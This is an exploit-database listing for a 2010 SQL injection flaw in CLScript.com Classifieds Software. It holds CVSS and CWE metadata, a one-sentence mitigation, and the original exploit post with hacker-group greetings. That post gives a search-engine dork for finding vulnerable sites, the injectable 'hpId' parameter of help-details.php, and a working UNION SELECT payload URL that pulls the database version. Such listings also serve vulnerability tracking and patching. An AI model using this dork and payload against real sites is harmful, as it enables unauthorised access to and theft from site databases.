header-logo
Suggest Exploit
vendor:
Classifieds Software
by:
41.w4r10r
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Classifieds Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache/Unix
2010

CLScript.com Classifieds Software SQL Injection

An SQL injection vulnerability exists in CLScript.com Classifieds Software, which allows an attacker to execute arbitrary SQL commands via the 'hpId' parameter in the 'help-details.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: CLScript.com Classifieds Software SQL Injection
Vunerability
# Date: 27-4-2010
# Author: 41.w4r10r
# Vendor Link : http://www.clscript.com/
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork : intext:"Powered by CLscript.com"
# Code :
---------------------------------------------------------------------------------------
############################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber
Warriors]
#Thanks:
SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################



Exploited Link :

1) http://example.com/help-details.php?hpId=-38'



Live Demo :

1)
http://example.com/help-details.php?hpId=-38+union+select+all+1,version(),3,4,5,6,7--




#41.w4r10r mailto:41.w4r10r@andhrahackers.com